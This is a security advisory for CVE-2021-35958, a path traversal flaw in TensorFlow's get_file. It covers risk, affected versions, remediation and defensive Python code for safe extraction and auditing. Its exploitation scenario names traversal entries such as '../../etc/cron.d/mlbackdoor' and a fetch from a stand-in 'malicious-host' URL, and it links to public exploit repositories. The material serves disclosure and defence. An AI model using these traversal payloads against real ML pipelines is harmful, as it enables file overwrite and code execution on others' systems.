CVE-2021-35958: TensorFlow: path traversal in get_file allows file overwrite
CRITICAL PoC AVAILABLE
Any ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.
Risk Assessment
Critical (CVSS 9.1). No authentication or user interaction is required: an attacker only needs to serve a malicious archive at a URL that the ML pipeline fetches. The file-overwrite primitive escalates readily to code execution by targeting Python scripts, config files, or model artifacts. ML training pipelines routinely download external datasets and pre-trained models at scale, so the attack surface is broader than for typical application CVEs. The vendor's position that the function 'isn't meant for untrusted archives' does not reduce operational risk where pipelines consume third-party datasets.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| tensorflow | pip | through 2.5.0 (per NVD description) | No patch |
Recommended Action
- Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.
- Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs, and flag all instances for review.
- Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names.
- Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.
- Implement file integrity monitoring on model artifacts and training data directories.
- For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.
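The member-path validation recommended above could look roughly like the following. This is a minimal sketch using only Python's standard tarfile and zipfile modules; the helper names (_is_within, safe_extract_tar, safe_extract_zip) are hypothetical and are not part of TensorFlow or Keras. It assumes the archive has already been downloaded to a local path (for example with extract=False) and that rejecting links and special files outright is acceptable for the pipeline.

```python
import os
import tarfile
import zipfile


def _is_within(base_dir: str, member_name: str) -> bool:
    """Return True if member_name, joined to base_dir, stays inside base_dir."""
    base = os.path.realpath(base_dir)
    # os.path.join discards `base` when member_name is absolute, so absolute
    # member names are caught by the same containment check.
    target = os.path.realpath(os.path.join(base, member_name))
    return os.path.commonpath([base, target]) == base


def safe_extract_tar(archive_path: str, dest_dir: str) -> None:
    """Extract a tar archive only if every member stays inside dest_dir."""
    with tarfile.open(archive_path) as tar:
        members = tar.getmembers()
        for member in members:
            if not _is_within(dest_dir, member.name):
                raise ValueError(f"unsafe path in archive: {member.name!r}")
            # Conservative choice for this sketch: refuse symlinks, hard links,
            # devices and FIFOs instead of trying to validate their targets.
            if not (member.isfile() or member.isdir()):
                raise ValueError(f"unsupported member type: {member.name!r}")
        kwargs = {}
        if hasattr(tarfile, "data_filter"):
            # Use the built-in 'data' extraction filter where the interpreter has it.
            kwargs["filter"] = "data"
        tar.extractall(dest_dir, members=members, **kwargs)


def safe_extract_zip(archive_path: str, dest_dir: str) -> None:
    """Extract a zip archive only if every member stays inside dest_dir."""
    with zipfile.ZipFile(archive_path) as zf:
        for name in zf.namelist():
            if not _is_within(dest_dir, name):
                raise ValueError(f"unsafe path in archive: {name!r}")
        zf.extractall(dest_dir)
```

Validating every member before extracting anything means a malicious archive is rejected as a whole, so no partially extracted files are left behind.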
Frequently Asked Questions
What is CVE-2021-35958?
Any ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.
Is CVE-2021-35958 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2021-35958, increasing the risk of exploitation.
How to fix CVE-2021-35958?
1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.
2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs, and flag all instances for review.
3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names.
4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.
5. Implement file integrity monitoring on model artifacts and training data directories.
6. For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.
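The audit in step 2 can be approximated without extra tooling. The sketch below uses Python's standard ast module to flag calls to any function named get_file that pass an extract keyword other than the literal False. The function name find_get_file_extract is hypothetical, and the check is deliberately coarse: it does not resolve imports, does not see arguments passed via **kwargs, and cannot tell whether the URL is actually untrusted, so every hit still needs manual review.

```python
import ast


def find_get_file_extract(source: str, filename: str = "<string>"):
    """Return (filename, line) pairs for get_file(...) calls that enable extract."""
    findings = []
    tree = ast.parse(source, filename=filename)
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Matches both `get_file(...)` and `something.get_file(...)`.
        if isinstance(func, ast.Attribute):
            name = func.attr
        else:
            name = getattr(func, "id", None)
        if name != "get_file":
            continue
        for kw in node.keywords:
            if kw.arg != "extract":
                continue
            is_literal_false = (
                isinstance(kw.value, ast.Constant) and kw.value.value is False
            )
            if not is_literal_false:
                findings.append((filename, node.lineno))
    return findings
```

To scan a repository, the function could be applied to the contents of each .py file, with the resulting file and line pairs fed into the review queue.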
What systems are affected by CVE-2021-35958?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, model loading and serving, CI/CD ML pipelines, notebook environments.
What is the CVSS score for CVE-2021-35958?
CVE-2021-35958 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.09%.
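As a cross-check, the 9.1 base score can be reproduced from the vector listed under CVSS Vector in this advisory (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H). The sketch below applies the CVSS v3.1 base-score equations for the unchanged-scope case only; the function names are illustrative, and the metric weights are those published in the CVSS v3.1 specification.

```python
import math

# Metric weights from the CVSS v3.1 specification (PR values are for Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a CVSS:3.1 vector with Scope: Unchanged."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise NotImplementedError("this sketch only covers Scope: Unchanged")
    w = {key: WEIGHTS[key][metrics[key]] for key in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"))  # 9.1
```

Here the impact sub-score is 6.42 × 0.8064 ≈ 5.18 and the exploitability sub-score is about 3.89; their sum of roughly 9.06 rounds up to 9.1.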
Technical Details
NVD Description
TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives.
Exploitation Scenario
An adversary registers a lookalike domain mimicking a popular ML dataset repository or compromises a legitimate one. They publish a malicious .tar.gz archive containing a crafted entry with a traversal path such as ../../app/train.py or ../../etc/cron.d/mlbackdoor. When the ML training pipeline executes tf.keras.utils.get_file('dataset.tar.gz', origin='https://malicious-host/dataset.tar.gz', extract=True), TensorFlow extracts the archive without validating member paths. The attacker's payload overwrites a training script or scheduled task, which executes during the next model run or system event. The result is persistent code execution on ML infrastructure with the pipeline's credentials and network access.
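To see why such member names are dangerous, it helps to resolve them against an extraction directory. The snippet below is a harmless illustration that only manipulates path strings and touches no files. The destination /home/ml/.keras/datasets is a hypothetical example directory, the function name resolves_outside is made up for this sketch, and the check assumes POSIX-style paths.

```python
import posixpath


def resolves_outside(dest_dir: str, member_name: str) -> bool:
    """Return True if member_name would land outside dest_dir when extracted."""
    dest = posixpath.normpath(dest_dir)
    # posixpath.join discards dest when member_name is absolute.
    target = posixpath.normpath(posixpath.join(dest, member_name))
    return not (target == dest or target.startswith(dest + "/"))


dest = "/home/ml/.keras/datasets"  # hypothetical extraction directory
for name in ["images/cat.png", "../../app/train.py", "/etc/cron.d/mlbackdoor"]:
    print(name, "->", "escapes" if resolves_outside(dest, name) else "stays inside")
```

With this destination, ../../app/train.py normalizes to /home/ml/app/train.py, which is outside the dataset cache; an extractor that joins paths without such a check writes there.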
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
References
- docs.python.org/3/library/tarfile.html 3rd Party
- github.com/tensorflow/tensorflow/blob/b8cad4c631096a34461ff8a07840d5f4d123ce32/tensorflow/python/keras/README.md 3rd Party
- github.com/tensorflow/tensorflow/blob/b8cad4c631096a34461ff8a07840d5f4d123ce32/tensorflow/python/keras/utils/data_utils.py 3rd Party
- keras.io/api/ 3rd Party
- vuln.ryotak.me/advisories/52 3rd Party
- github.com/miguelc49/CVE-2021-35958-1 Exploit
- github.com/miguelc49/CVE-2021-35958-2 Exploit
Related Vulnerabilities
- CVE-2020-15196 9.9 TensorFlow: heap OOB read in sparse/ragged count ops (same package: tensorflow)
- CVE-2020-15205 9.8 TensorFlow: heap overflow in StringNGrams, ASLR bypass (same package: tensorflow)
- CVE-2020-15208 9.8 TFLite: OOB read/write via tensor dimension mismatch (same package: tensorflow)
- CVE-2019-16778 9.8 TensorFlow: heap overflow in UnsortedSegmentSum op (same package: tensorflow)
- CVE-2022-23587 9.8 TensorFlow: integer overflow in Grappler enables RCE (same package: tensorflow)
AI Threat Alert